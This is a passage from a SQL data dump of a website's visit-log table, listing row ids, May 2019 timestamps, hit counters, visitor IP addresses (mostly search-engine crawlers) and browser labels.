72,1,1,0,0,'87.250.224.81','other'),(420015,1557803453,1,1,0,0,'8.29.198.26','other'),(420016,1557803500,1,1,0,0,'8.29.198.25','other'),(420017,1557805340,1,1,0,0,'66.249.66.218','chrome'),(420018,1557805551,1,1,0,0,'66.249.66.128','chrome'),(420019,1557805836,1,1,0,0,'207.46.13.21','other'),(420020,1557806325,1,1,0,0,'207.46.13.37','other'),(420021,1557806457,1,1,0,0,'5.45.207.19','other'),(420022,1557807025,1,1,0,0,'178.154.244.11','other'),(420023,1557807453,1,1,0,0,'87.250.224.47','other'),(420024,1557807486,1,1,0,0,'66.249.66.218','chrome'),(420025,1557808368,1,1,0,0,'178.154.244.11','other'),(420026,1557810175,1,1,0,0,'207.46.13.21','other'),(420027,1557810670,1,1,0,0,'66.249.66.130','chrome'),(420028,1557810874,1,1,0,0,'66.249.66.220','chrome'),(420029,1557811063,1,1,0,0,'66.249.66.222','chrome'),(420030,1557811441,1,1,0,0,'5.255.253.25','other'),(420031,1557811626,1,1,0,0,'54.36.108.162','other'),(420032,1557811899,2,2,0,0,'18.237.76.26','chrome'),(420033,1557812596,1,1,0,0,'95.132.13.220','chrome'),(420034,1557812598,1,1,0,0,'66.249.66.218','chrome'),(420035,1557813185,1,1,0,0,'195.234.7.43','chrome'),(420036,1557813378,1,1,0,0,'66.249.66.128','chrome'),(420037,1557814333,2,2,0,0,'8.29.198.27','other'),(420038,1557814577,1,1,0,0,'157.55.39.214','other'),(420039,1557815019,1,1,0,0,'5.45.207.79','other'),(420040,1557815084,1,1,0,0,'66.249.66.128','chrome'),(420041,1557815159,1,1,0,0,'87.250.224.47','other'),(420042,1557815284,1,1,0,0,'207.46.13.84','other'),(420043,1557815413,1,1,0,0,'195.211.213.106','chrome'),(420044,1557815416,1,1,0,0,'178.154.244.11','other'),(420045,1557815817,1,1,0,0,'91.196.178.85','chrome'),(420046,1557816058,1,1,0,0,'66.249.66.128','chrome'),(420047,1557816078,1,1,0,0,'66.249.66.222','chrome'),(420048,1557816720,1,1,0,0,'91.196.178.85','chrome'),(420049,1557818390,1,1,0,0,'157.55.39.214','other'),(420050,1557819292,1,1,0,0,'66.249.66.222','chrome'),(420051,1557819340,1,1,0,0,'5.45.207.79','other'),(420052,1557819505,1,1,0,0,'66.249.66.220','chrome'),(420053,1557820261,1,1,0,0,'193.106.30.98','chrome'),(420054,1557820404,1,1,0,0,'94.100.221.234','chrome'),(420055,1557820520,1,1,0,0,'141.8.132.16','other'),(420056,1557820726,1,1,0,0,'66.249.66.220','chrome'),(420057,1557820782,1,1,0,0,'66.249.66.130','chrome'),(420058,1557820920,1,1,0,0,'46.211.56.182','chrome'),(420059,1557821046,1,1,0,0,'95.108.213.4','other'),(420060,1557821048,1,1,0,0,'91.196.178.183','chrome'),(420061,1557821693,1,1,0,0,'66.249.66.218','chrome'),(420062,1557821736,2,2,0,0,'66.249.66.132','chrome'),(420063,1557821857,1,1,0,0,'95.163.255.151','other'),(420064,1557821895,1,1,0,0,'66.249.66.222','chrome'),(420065,1557822203,1,1,0,0,'66.249.66.128','chrome'),(420066,1557822373,1,1,0,0,'95.132.14.100','firefox'),(420067,1557822738,1,1,0,0,'207.46.13.77','other'),(420068,1557822803,2,2,0,0,'66.249.66.220','chrome'),(420069,1557823164,2,2,0,0,'66.249.66.218','chrome'),(420070,1557823899,1,1,0,0,'66.249.66.222','chrome'),(420071,1557824037,1,1,0,0,'66.249.66.130','chrome'),(420072,1557824072,1,1,0,0,'207.46.13.77','other'),(420073,1557824172,1,1,0,0,'95.108.213.4','other'),(420074,1557825036,4,4,0,0,'176.108.102.110','chrome'),(420075,1557825224,1,1,0,0,'8.29.198.25','other'),(420076,1557825230,1,1,0,0,'8.29.198.26','other'),(420077,1557825269,1,1,0,0,'207.46.13.75','other'),(420078,1557825293,1,1,0,0,'91.196.178.171','chrome'),(420079,1557826062,2,2,0,0,'66.249.66.218','chrome'),(420080,1557826726,2,2,0,0,'66.249.66.220','chrome'),(420081,1557827678,2,2,0,0,'66.249.66.222','chrome'),(420082,1557828042,3,3,0,0,'66.249.66.220','chrome'),(420083,1557828979,1,1,0,0,'109.74.154.72','chrome'),(420084,1557828998,2,2,0,0,'91.196.178.169','chrome'),(420085,1557829780,1,1,0,0,'178.154.171.30','other'),(420086,1557830012,1,1,0,0,'207.46.13.77','other'),(420087,1557830726,3,3,0,0,'146.148.45.167','chrome'),(420088,1557830748,3,3,0,0,'35.225.235.119','chrome'),(420089,1557830765,3,3,0,0,'35.226.247.41','chrome'),(420090,1557830780,3,3,0,0,'35.188.137.211','chrome'),(420091,1557830796,3,3,0,0,'104.154.232.109','chrome'),(420092,1557830811,3,3,0,0,'130.211.120.198','chrome'),(420093,1557830838,1,1,0,0,'66.249.66.130','chrome'),(420094,1557830859,1,1,0,0,'66.249.66.218','chrome'),(420095,1557831468,1,1,0,0,'66.249.66.222','chrome'),(420096,1557831847,1,1,0,0,'93.72.168.140','firefox'),(420097,1557832255,1,1,0,0,'66.249.66.218','chrome'),(420098,1557832650,1,1,0,0,'178.154.244.11','other'),(420099,1557832672,1,1,0,0,'157.55.39.142','other'),(420100,1557833316,1,1,0,0,'66.249.66.220','chrome'),(420101,1557833700,1,1,0,0,'13.66.139.0','other'),(420102,1557833820,1,1,0,0,'141.8.142.103','other'),(420103,1557833957,1,1,0,0,'66.249.66.132','chrome'),(420104,1557834025,1,1,0,0,'66.249.66.81','chrome'),(420105,1557834166,1,1,0,0,'87.250.224.47','other'),(420106,1557834328,1,1,0,0,'95.108.181.75','other'),(420107,1557834625,2,2,0,0,'66.249.66.220','chrome'),(420108,1557834956,2,2,0,0,'66.249.66.222','chrome'),(420109,1557835126,1,1,0,0,'91.196.178.85','chrome'),(420110,1557835384,1,1,0,0,'91.196.178.83','firefox'),(420111,1557835753,1,1,0,0,'66.249.66.132','chrome'),(420112,1557836100,2,2,0,0,'8.29.198.27','other'),(420113,1557836368,1,1,0,0,'95.132.56.35','firefox'),(420114,1557836521,1,1,0,0,'66.249.66.222','chrome'),(420115,1557836569,1,1,0,0,'66.249.66.218','chrome'),(420116,1557836718,1,1,0,0,'95.163.255.96','other'),(420117,1557836920,1,1,0,0,'185.206.225.229','firefox'),(420118,1557837531,2,2,0,0,'66.249.66.222','chrome'),(420119,1557837611,1,1,0,0,'46.175.140.82','chrome'),(420120,1557837678,1,1,0,0,'66.249.66.83','chrome'),(420121,1557837693,1,1,0,0,'66.249.66.68','chrome'),(420122,1557837778,1,1,0,0,'66.249.66.82','chrome'),(420123,1557837837,2,2,0,0,'66.249.66.218','chrome'),(420124,1557838902,1,1,0,0,'66.249.66.82','chrome'),(420125,1557839057,2,2,0,0,'66.249.66.222','chrome'),(420126,1557839065,1,1,0,0,'157.55.39.149','other'),(420127,1557839180,1,1,0,0,'95.108.181.54','other'),(420128,1557839193,1,1,0,0,'178.154.244.21','other'),(420129,1557839318,1,1,0,0,'141.8.183.11','other'),(420130,1557839398,1,1,0,0,'78.111.188.4','chrome'),(420131,1557839466,1,1,0,0,'66.249.66.220','chrome'),(420132,1557839470,1,1,0,0,'66.249.66.218','chrome'),(420133,1557839720,1,1,0,0,'178.154.244.11','other'),(420134,1557839984,1,1,0,0,'91.196.178.85','chrome'),(420135,1557840944,1,1,0,0,'66.249.66.64','chrome'),(420136,1557840965,1,1,0,0,'66.249.66.82','chrome'),(420137,1557841019,1,1,0,0,'178.93.254.103','chrome'),(420138,1557841103,1,1,0,0,'66.249.66.130','chrome'),(420139,1557841431,1,1,0,0,'66.249.66.132','chrome'),(420140,1557841439,1,1,0,0,'157.55.39.99','other'),(420141,1557841505,1,1,0,0,'66.249.66.134','chrome'),(420142,1557841888,2,2,0,0,'66.249.66.81','chrome'),(420143,1557842469,1,1,0,0,'193.106.30.98','chrome'),(420144,1557842905,1,1,0,0,'51.77.52.160','chrome'),(420145,1557843778,3,3,0,0,'91.196.178.93','chrome'),(420146,1557843890,1,1,0,0,'40.77.167.206','other'),(420147,1557843892,1,1,0,0,'95.163.255.171','other'),(420148,1557844174,1,1,0,0,'193.106.30.98','chrome'),(420149,1557844288,1,1,0,0,'66.249.66.130','chrome'),(420150,1557844488,1,1,0,0,'87.250.224.47','other'),(420151,1557844610,2,2,0,0,'178.154.244.11','other'),(420152,1557844665,1,1,0,0,'5.45.207.79','other'),(420153,1557844921,1,1,0,0,'178.137.84.233','chrome'),(420154,1557846266,1,1,0,0,'66.249.66.218','chrome'),(420155,1557846506,1,1,0,0,'157.55.39.99','other'),(420156,1557846609,1,1,0,0,'157.55.39.149','other'),(420157,1557847028,2,2,0,0,'8.29.198.26','other'),(420158,1557847728,1,1,0,0,'178.154.171.24','other'),(420159,1557847950,1,1,0,0,'40.77.167.130','other'),(420160,1557849533,1,1,0,0,'5.45.207.19','other'),(420161,1557849555,2,2,0,0,'37.9.113.148','other'),(420162,1557849602,1,1,0,0,'178.154.244.11','other'),(420163,1557850041,1,1,0,0,'157.55.39.149','other'),(420164,1557850078,1,1,0,0,'66.249.66.132','chrome'),(420165,1557850091,1,1,0,0,'66.249.66.128','chrome'),(420166,1557850608,1,1,0,0,'66.249.66.218','chrome'),(420167,1557850619,1,1,0,0,'40.77.167.206','other'),(420168,1557851716,1,1,0,0,'66.249.66.220','chrome'),(420169,1557852069,1,1,0,0,'66.249.66.128','chrome'),(420170,1557854266,1,1,0,0,'178.154.244.11','other'),(420171,1557855122,1,1,0,0,'46.211.148.24','chrome'),(420172,1557855457,1,1,0,0,'40.77.167.206','other'),(420173,1557856630,1,1,0,0,'66.249.66.218','chrome'),(420174,1557856818,1,1,0,0,'178.154.244.11','other'),(420175,1557856831,1,1,0,0,'5.45.207.79','other'),(420176,1557857505,1,1,0,0,'66.249.66.220','chrome'),(420177,1557857877,1,1,0,0,'207.46.13.187','other'),(420178,1557857938,2,2,0,0,'8.29.198.26','other'),(420179,1557858459,1,1,0,0,'66.249.66.130','chrome'),(420180,1557858718,1,1,0,0,'5.45.207.19','other'),(420181,1557858736,1,1,0,0,'66.249.66.218','chrome'),(420182,1557858810,1,1,0,0,'46.211.68.113','chrome'),(420183,1557859431,1,1,0,0,'207.46.13.187','other'),(420184,1557860464,1,1,0,0,'157.55.39.54','other'),(420185,1557860924,1,1,0,0,'95.163.255.183','other'),(420186,1557861567,1,1,0,0,'66.249.66.220','chrome'),(420187,1557861637,2,2,0,0,'66.249.66.130','chrome'),(420188,1557862125,1,1,0,0,'5.45.207.79','other'),(420189,1557862315,1,1,0,0,'66.249.66.218','chrome'),(420190,1557862586,1,1,0,0,'157.55.39.10','other'),(420191,1557863619,1,1,0,0,'178.154.171.30','other'),(420192,1557863682,1,1,0,0,'66.249.66.218','chrome'),(420193,1557865240,1,1,0,0,'66.249.66.130','chrome'),(420194,1557866299,1,1,0,0,'66.249.66.220','chrome'),(420195,1557866348,1,1,0,0,'95.163.255.94','other'),(420196,1557866823,1,1,0,0,'40.77.167.89','other'),(420197,1557866939,1,1,0,0,'66.249.66.222','chrome'),(420198,1557868149,1,1,0,0,'178.154.200.8','other'),(420199,1557868249,1,1,0,0,'157.55.39.171','other'),(420200,1557868350,1,1,0,0,'66.249.66.218','chrome'),(420201,1557868823,1,1,0,0,'8.29.198.27','other'),(420202,1557868844,1,1,0,0,'8.29.198.26','other'),(420203,1557869317,1,1,0,0,'157.55.39.171','other'),(420204,1557869591,1,1,0,0,'40.77.167.89','other'),(420205,1557870404,1,1,0,0,'157.55.39.54','other'),(420206,1557872626,1,1,0,0,'13.66.139.0','other'),(420207,1557873067,1,1,0,0,'66.249.66.220','chrome'),(420208,1557873246,1,1,0,0,'66.249.66.222','chrome'),(420209,1557873969,1,1,0,0,'60.191.38.77','firefox'),(420210,1557874292,1,1,0,0,'66.249.66.222','chrome'),(420211,1557874984,1,1,0,0,'95.163.255.170','other'),(420212,1557875209,2,2,0,0,'207.46.13.40','other'),(420213,1557875388,1,1,0,0,'40.77.167.166','other'),(420214,1557876230,1,1,0,0,'157.55.39.171','other'),(420215,1557876428,1,1,0,0,'87.250.224.107','other'),(420216,1557876607,1,1,0,0,'40.77.167.89','other'),(420217,1557876655,1,1,0,0,'213.180.203.53','other'),(420218,1557878950,1,1,0,0,'207.46.13.120','other'),(420219,1557878953,1,1,0,0,'66.249.66.218','chrome'),(420220,1557879253,1,1,0,0,'207.46.13.249','other'),(420221,1557879278,1,1,0,0,'66.249.66.130','chrome'),(420222,1557879289,1,1,0,0,'66.249.66.128','chrome'),(420223,1557879414,1,1,0,0,'66.249.66.132','chrome'),(420224,1557879512,1,1,0,0,'157.55.39.195','other'),(420225,1557879700,1,1,0,0,'8.29.198.25','other'),(420226,1557879734,1,1,0,0,'8.29.198.26','other'),(420227,1557880568,1,1,0,0,'66.249.66.132','chrome'),(420228,1557880889,1,1,0,0,'66.249.66.130','chrome'),(420229,1557881061,1,1,0,0,'13.66.139.0','other'),(420230,1557881068,1,1,0,0,'66.249.66.128','chrome'),(420231,1557881114,1,1,0,0,'87.250.224.107','other'),(420232,1557881417,1,1,0,0,'66.249.66.218','chrome'),(420233,1557882428,1,1,0,0,'66.249.66.218','chrome'),(420234,1557882787,1,1,0,0,'66.249.66.220','chrome'),(420235,1557883164,1,1,0,0,'104.148.64.26','chrome'),(420236,1557885209,1,1,0,0,'157.55.39.195','other'),(420237,1557885667,1,1,0,0,'66.249.66.128','chrome'),(420238,1557885792,1,1,0,0,'66.249.66.218','chrome'),(420239,1557886957,1,1,0,0,'66.249.66.132','chrome'),(420240,1557887429,1,1,0,0,'66.249.66.220','chrome'),(420241,1557887644,1,1,0,0,'5.45.207.80','other'),(420242,1557888276,1,1,0,0,'141.8.142.191','other'),(420243,1557888504,1,1,0,0,'66.249.66.132','chrome'),(420244,1557888605,1,1,0,0,'157.55.39.195','other'),(420245,1557888954,1,1,0,0,'66.249.66.218','chrome'),(420246,1557889471,1,1,0,0,'207.46.13.120','other'),(420247,1557889950,2,2,0,0,'34.215.79.138','chrome'),(420248,1557890074,1,1,0,0,'87.250.224.47','other'),(420249,1557890181,1,1,0,0,'141.8.142.103','other'),(420250,1557890257,1,1,0,0,'212.164.39.109','chrome'),(420251,1557890569,2,2,0,0,'8.29.198.27','other'),(420252,1557891508,1,1,0,0,'87.250.224.65','other'),(420253,1557891747,1,1,0,0,'95.84.186.86','chrome'),(420254,1557891871,1,1,0,0,'66.249.66.220','chrome'),(420255,1557892063,1,1,0,0,'40.77.167.56','other'),(420256,1557892904,1,1,0,0,'207.46.13.19','other'),(420257,1557894511,2,2,0,0,'95.108.181.54','other'),(420258,1557894639,1,1,0,0,'95.108.181.83','other'),(420259,1557894817,1,1,0,0,'5.255.253.25','other'),(420260,1557894821,1,1,0,0,'141.8.142.38','other'),(420261,1557894985,1,1,0,0,'5.45.207.79','other'),(420262,1557895019,1,1,0,0,'207.46.13.7','other'),(420263,1557895899,1,1,0,0,'66.249.66.218','chrome'),(420264,1557896818,1,1,0,0,'66.249.66.132','chrome'),(420265,1557897220,3,3,0,0,'66.249.66.222','chrome'),(420266,1557897663,1,1,0,0,'207.46.13.120','other'),(420267,1557897985,1,1,0,0,'185.244.148.126','other'),(420268,1557898544,1,1,0,0,'66.249.66.130','chrome'),(420269,1557898671,1,1,0,0,'141.8.142.191','other'),(420270,1557898680,1,1,0,0,'5.45.207.80','other'),(420271,1557898804,2,2,0,0,'207.46.13.7','other'),(420272,1557898872,3,3,0,0,'5.45.207.76','other'),(420273,1557899039,1,1,0,0,'95.108.181.54','other'),(420274,1557899129,1,1,0,0,'93.75.80.203','msie'),(420275,1557900959,1,1,0,0,'66.249.66.222','chrome'),(420276,1557901424,1,1,0,0,'8.29.198.26','other'),(420277,1557901473,1,1,0,0,'8.29.198.27','other'),(420278,1557901920,1,1,0,0,'40.77.167.56','other'),(420279,1557902258,1,1,0,0,'91.196.178.88','chrome'),(420280,1557902264,2,2,0,0,'66.249.66.222','chrome'),(420281,1557903170,1,1,0,0,'178.154.171.17','other'),(420282,1557903172,1,1,0,0,'37.9.113.148','other'),(420283,1557904066,1,1,0,0,'66.249.66.132','chrome'),(420284,1557904603,1,1,0,0,'209.17.96.58','other'),(420285,1557905191,1,1,0,0,'37.55.135.22','chrome'),(420286,1557905717,2,2,0,0,'178.133.96.69','other'),(420287,1557906477,2,2,0,0,'207.46.13.7','other'),(420288,1557907554,1,1,0,0,'141.8.142.191','other'),(420289,1557907586,1,1,0,0,'66.249.66.130','chrome'),(420290,1557907785,1,1,0,0,'141.8.183.11','other'),(420291,1557907866,1,1,0,0,'77.111.247.156','chrome'),(420292,1557907898,1,1,0,0,'141.8.142.103','other'),(420293,1557908366,1,1,0,0,'207.46.13.40','other'),(420294,1557909012,1,1,0,0,'207.46.13.92','other'),(420295,1557909173,1,1,0,0,'141.8.183.11','other'),(420296,1557909319,1,1,0,0,'66.249.66.130','chrome'),(420297,1557909493,1,1,0,0,'66.249.66.82','chrome'),(420298,1557910011,2,2,0,0,'66.249.66.222','chrome'),(420299,1557910093,1,1,0,0,'157.55.39.92','other'),(420300,1557911196,2,2,0,0,'66.249.66.220','chrome'),(420301,1557911953,1,1,0,0,'66.249.66.218','chrome'),(420302,1557912294,1,1,0,0,'8.29.198.26','other'),(420303,1557912339,1,1,0,0,'8.29.198.27','other'),(420304,1557912958,1,1,0,0,'141.8.142.103','other'),(420305,1557913179,1,1,0,0,'157.55.39.253','other'),(420306,1557914482,1,1,0,0,'207.46.13.180','other'),(420307,1557916286,1,1,0,0,'66.249.66.222','chrome'),(420308,1557916502,1,1,0,0,'109.74.154.72','chrome'),(420309,1557916522,2,2,0,0,'95.213.141.126','opera'),(420310,1557917241,3,3,0,0,'35.184.212.190','chrome'),(420311,1557917257,5,5,0,0,'35.238.60.40','chrome'),(420312,1557917280,3,3,0,0,'35.193.176.34','chrome'),(420313,1557917490,1,1,0,0,'66.249.66.130','chrome'),(420314,1557917503,1,1,0,0,'66.249.66.222','chrome'),(420315,1557917932,1,1,0,0,'5.255.253.22','other'),(420316,1557918022,1,1,0,0,'5.45.207.19','other'),(420317,1557918026,1,1,0,0,'213.180.203.48','other'),(420318,1557918646,1,1,0,0,'141.8.142.103','other'),(420319,1557918725,1,1,0,0,'66.249.66.222','chrome'),(420320,1557919304,1,1,0,0,'5.45.207.19','other'),(420321,1557919414,1,1,0,0,'207.46.13.144','other'),(420322,1557919520,1,1,0,0,'40.77.167.2','other'),(420323,1557919853,1,1,0,0,'66.249.66.218','chrome'),(420324,1557919884,1,1,0,0,'66.249.66.132','chrome'),(420325,1557920667,1,1,0,0,'180.76.15.136','other'),(420326,1557921369,1,1,0,0,'178.54.59.32','chrome'),(420327,1557921546,1,1,0,0,'40.77.167.103','other'),(420328,1557921747,1,1,0,0,'40.77.167.2','other'),(420329,1557922245,1,1,0,0,'193.106.30.98','chrome'),(420330,1557922552,1,1,0,0,'207.46.13.144','other'),(420331,1557922638,1,1,0,0,'207.46.13.180','other'),(420332,1557922699,1,0,1,0,'66.249.66.222',''),(420333,1557923161,1,1,0,0,'8.29.198.26','other'),(420334,1557923206,1,1,0,0,'8.29.198.25','other'),(420335,1557923424,1,1,0,0,'178.154.244.11','other'),(420336,1557923578,1,1,0,0,'178.154.200.8','other'),(420337,1557923616,1,1,0,0,'40.77.167.2','other'),(420338,1557923719,1,1,0,0,'66.249.66.220','chrome'),(420339,1557923808,1,1,0,0,'66.249.66.218','chrome'),(420340,1557923810,1,1,0,0,'5.255.253.16','other'),(420341,1557924204,1,1,0,0,'207.46.13.180','other'),(420342,1557924536,1,1,0,0,'159.224.13.21','chrome'),(420343,1557925319,1,1,0,0,'95.132.46.114','chrome'),(420344,1557925322,1,1,0,0,'66.249.66.132','chrome'),(420345,1557925421,1,1,0,0,'188.187.25.160','msie'),(420346,1557925705,2,2,0,0,'66.249.66.222','chrome'),(420347,1557926019,1,1,0,0,'66.249.66.128','chrome'),(420348,1557926371,1,1,0,0,'95.135.176.154','chrome'),(420349,1557926767,1,1,0,0,'40.77.167.2','other'),(420350,1557927012,1,1,0,0,'207.46.13.180','other'),(420351,1557927854,1,1,0,0,'149.154.161.17','other'),(420352,1557928146,1,1,0,0,'159.224.13.21','chrome'),(420353,1557928222,1,1,0,0,'178.154.171.17','other'),(420354,1557928397,2,2,0,0,'207.46.13.180','other'),(420355,1557928603,1,1,0,0,'5.255.253.22','other'),(420356,1557928703,1,1,0,0,'87.250.224.47','other'),(420357,1557928936,1,1,0,0,'66.249.66.218','chrome'),(420358,1557928981,2,2,0,0,'157.55.39.83','other'),(420359,1557929307,1,1,0,0,'157.55.39.147','other'),(420360,1557929319,1,1,0,0,'40.77.167.2','other'),(420361,1557930171,1,1,0,0,'176.9.9.94','other'),(420362,1557931123,1,1,0,0,'40.77.167.4','other'),(420363,1557931128,2,2,0,0,'157.55.39.83','other'),(420364,1557931435,1,1,0,0,'40.77.167.2','other'),(420365,1557931537,1,1,0,0,'40.77.167.39','other'),(420366,1557932715,1,1,0,0,'66.249.66.222','chrome'),(420367,1557932764,1,1,0,0,'157.55.39.83','other'),(420368,1557933005,1,1,0,0,'66.249.66.218','chrome'),(420369,1557933012,1,1,0,0,'5.164.146.133','chrome'),(420370,1557933283,1,1,0,0,'66.249.66.128','chrome'),(420371,1557933809,1,1,0,0,'66.249.66.220','chrome'),(420372,1557934074,1,1,0,0,'8.29.198.27','other'),(420373,1557934089,1,1,0,0,'8.29.198.25','other'),(420374,1557934113,1,1,0,0,'157.55.39.83','other'),(420375,1557935409,1,1,0,0,'91.196.178.136','firefox'),(420376,1557935501,1,1,0,0,'66.249.66.220','chrome'),(420377,1557935609,2,2,0,0,'40.77.167.46','other'),(420378,1557935733,1,1,0,0,'66.249.66.132','chrome'),(420379,1557936265,1,1,0,0,'66.249.66.218','chrome'),(420380,1557936351,1,1,0,0,'66.249.66.222','chrome'),(420381,1557936572,1,1,0,0,'87.250.224.107','other'),(420382,1557936643,1,1,0,0,'95.108.181.57','other'),(420383,1557936977,2,2,0,0,'13.230.73.37','other'),(420384,1557937292,1,1,0,0,'40.77.167.78','other'),(420385,1557938070,1,1,0,0,'207.46.13.85','other'),(420386,1557938094,1,1,0,0,'91.196.178.136','chrome'),(420387,1557938679,1,1,0,0,'66.249.66.220','chrome'),(420388,1557939397,1,1,0,0,'157.55.39.83','other'),(420389,1557939574,1,1,0,0,'13.66.139.0','other'),(420390,1557940161,1,1,0,0,'178.154.200.8','other'),(420391,1557940176,1,1,0,0,'87.250.224.107','other'),(420392,1557940212,1,1,0,0,'37.9.113.148','other'),(420393,1557940330,1,1,0,0,'178.154.244.21','other'),(420394,1557940427,1,1,0,0,'5.45.207.76','other'),(420395,1557940430,1,1,0,0,'87.250.224.64','other'),(420396,1557941396,1,1,0,0,'40.77.167.39','other'),(420397,1557941939,1,1,0,0,'178.154.171.30','other'),(420398,1557942170,1,1,0,0,'66.249.66.222','chrome'),(420399,1557942178,1,1,0,0,'157.55.39.83','other'),(420400,1557942458,1,1,0,0,'95.163.255.97','other'),(420401,1557942871,1,1,0,0,'66.249.66.130','chrome'),(420402,1557942977,1,1,0,0,'66.249.66.132','chrome'),(420403,1557944243,1,1,0,0,'178.154.244.11','other'),(420404,1557944405,1,1,0,0,'158.177.104.87','chrome'),(420405,1557944418,1,1,0,0,'157.55.39.83','other'),(420406,1557944560,1,1,0,0,'62.210.83.78','firefox'),(420407,1557944613,1,1,0,0,'193.106.30.98','chrome'),(420408,1557944938,1,1,0,0,'66.249.66.128','chrome'),(420409,1557944948,1,1,0,0,'8.29.198.25','other'),(420410,1557944955,1,1,0,0,'8.29.198.27','other'),(420411,1557945396,1,1,0,0,'207.46.13.85','other'),(420412,1557945411,1,1,0,0,'66.249.66.220','chrome'),(420413,1557946009,1,1,0,0,'40.77.167.78','other'),(420414,1557946295,1,1,0,0,'91.196.178.94','firefox'),(420415,1557947260,1,1,0,0,'66.249.66.130','chrome'),(420416,1557947939,1,1,0,0,'207.46.13.85','other'),(420417,1557947985,1,1,0,0,'87.250.224.81','other'),(420418,1557948043,6,6,0,0,'176.9.9.94','other'),(420419,1557948675,1,1,0,0,'91.196.178.171','chrome'),(420420,1557949340,1,1,0,0,'5.45.207.79','other'),(420421,1557949897,1,1,0,0,'66.249.66.218','chrome'),(420422,1557949992,2,2,0,0,'40.77.167.78','other'),(420423,1557951038,2,2,0,0,'66.249.66.130','chrome'),(420424,1557952511,1,1,0,0,'157.55.39.83','other'),(420425,1557953399,1,1,0,0,'66.249.66.130','chrome'),(420426,1557954486,1,1,0,0,'157.55.39.203','other'),(420427,1557954728,1,1,0,0,'5.45.207.79','other'),(420428,1557955647,1,1,0,0,'66.249.66.220','chrome'),(420429,1557955826,1,1,0,0,'8.29.198.27','other'),(420430,1557955844,1,1,0,0,'8.29.198.26','other'),(420431,1557956063,1,1,0,0,'40.77.167.31','other'),(420432,1557956944,1,1,0,0,'13.66.139.0','other'),(420433,1557957316,1,1,0,0,'40.77.167.31','other'),(420434,1557958319,1,1,0,0,'3.90.56.208','other'),(420435,1557959159,2,2,0,0,'157.55.39.211','other'),(420436,1557959874,1,1,0,0,'66.249.66.218','chrome'),(420437,1557961178,1,1,0,0,'40.77.167.31','other'),(420438,1557961301,1,1,0,0,'40.77.167.141','other'),(420439,1557961675,1,1,0,0,'5.45.207.80','other'),(420440,1557961757,1,1,0,0,'157.55.39.211','other'),(420441,1557961796,1,1,0,0,'66.249.66.130','chrome'),(420442,1557962491,1,1,0,0,'176.110.134.2','chrome'),(420443,1557962801,1,1,0,0,'95.163.255.92','other'),(420444,1557963112,1,1,0,0,'40.77.167.51','other'),(420445,1557963224,1,1,0,0,'66.249.66.218','chrome'),(420446,1557963315,1,1,0,0,'95.163.255.184','other'),(420447,1557963484,1,1,0,0,'66.249.66.222','chrome'),(420448,1557964829,1,1,0,0,'66.249.66.132','chrome'),(420449,1557965275,1,1,0,0,'40.77.167.141','other'),(420450,1557965542,8,8,0,0,'176.9.9.94','other'),(420451,1557965605,1,1,0,0,'66.249.66.222','chrome'),(420452,1557965804,1,1,0,0,'95.163.255.186','other'),(420453,1557966213,1,1,0,0,'5.45.207.79','other'),(420454,1557966444,4,4,0,0,'176.9.9.94','other'),(420455,1557966700,1,1,0,0,'8.29.198.27','other'),(420456,1557966711,1,1,0,0,'8.29.198.25','other'),(420457,1557966877,1,1,0,0,'193.106.30.98','chrome'),(420458,1557967298,2,2,0,0,'207.46.13.78','other'),(420459,1557967469,2,2,0,0,'66.249.66.218','chrome'),(420460,1557968574,1,1,0,0,'66.249.66.222','chrome'),(420461,1557969316,2,2,0,0,'66.249.66.220','chrome'),(420462,1557969641,1,1,0,0,'95.108.181.57','other'),(420463,1557969729,1,1,0,0,'141.8.142.191','other'),(420464,1557969746,1,1,0,0,'193.106.30.98','chrome'),(420465,1557970094,1,1,0,0,'157.55.39.211','other'),(420466,1557970282,1,1,0,0,'95.163.255.156','other'),(420467,1557970311,1,1,0,0,'66.249.66.130','chrome'),(420468,1557970345,1,1,0,0,'40.77.167.51','other'),(420469,1557970398,1,1,0,0,'66.249.66.222','chrome'),(420470,1557971163,1,1,0,0,'40.77.167.43','other'),(420471,1557971310,1,1,0,0,'40.77.167.175','other'),(420472,1557971474,2,2,0,0,'66.249.66.218','chrome'),(420473,1557971926,1,1,0,0,'40.77.167.77','other'),(420474,1557972945,2,2,0,0,'40.77.167.173','other'),(420475,1557972988,1,1,0,0,'40.77.167.105','other'),(420476,1557972993,1,1,0,0,'40.77.167.77','other'),(420477,1557973457,1,1,0,0,'62.122.95.164','chrome'),(420478,1557973676,1,1,0,0,'141.8.142.144','other'),(420479,1557973763,1,1,0,0,'37.9.113.148','other'),(420480,1557973847,1,1,0,0,'87.250.224.118','other'),(420481,1557973870,1,1,0,0,'5.45.207.19','other'),(420482,1557973876,1,1,0,0,'87.250.224.81','other'),(420483,1557974177,1,1,0,0,'13.66.139.0','other'),(420484,1557975586,1,1,0,0,'95.108.181.57','other'),(420485,1557976398,1,1,0,0,'95.163.255.161','other'),(420486,1557977151,1,1,0,0,'95.163.255.167','other'),(420487,1557977178,1,1,0,0,'95.163.255.156','other'),(420488,1557977575,1,1,0,0,'8.29.198.27','other'),(420489,1557977582,1,1,0,0,'8.29.198.26','other'),(420490,1557977633,1,1,0,0,'5.45.207.19','other'),(420491,1557977637,1,1,0,0,'178.154.244.11','other'),(420492,1557977679,1,1,0,0,'66.249.66.130','chrome'),(420493,1557977916,1,1,0,0,'95.108.213.4','other'),(420494,1557978002,3,3,0,0,'157.55.39.115','other'),(420495,1557978124,1,1,0,0,'13.66.139.0','other'),(420496,1557978159,1,1,0,0,'5.45.207.79','other'),(420497,1557979272,1,1,0,0,'66.249.66.222','chrome'),(420498,1557980525,1,1,0,0,'207.46.13.207','other'),(420499,1557981314,1,1,0,0,'95.163.255.94','other'),(420500,1557981328,1,1,0,0,'207.46.13.27','other'),(420501,1557981505,1,1,0,0,'40.77.167.175','other'),(420502,1557981563,1,1,0,0,'95.163.255.155','other'),(420503,1557981601,2,2,0,0,'34.215.61.19','chrome'),(420504,1557982071,1,1,0,0,'40.77.167.105','other'),(420505,1557982200,1,1,0,0,'141.8.142.103','other'),(420506,1557982331,1,1,0,0,'178.154.244.11','other'),(420507,1557983011,1,1,0,0,'66.249.66.132','chrome'),(420508,1557983409,1,1,0,0,'207.46.13.133','other'),(420509,1557984084,1,1,0,0,'51.15.187.209','other'),(420510,1557984695,1,1,0,0,'66.249.66.130','chrome'),(420511,1557984755,1,1,0,0,'66.249.66.220','chrome'),(420512,1557985505,1,1,0,0,'157.55.39.160','other'),(420513,1557985636,1,1,0,0,'91.196.178.88','chrome'),(420514,1557986235,1,1,0,0,'5.255.253.16','other'),(420515,1557986340,1,1,0,0,'87.250.224.81','other'),(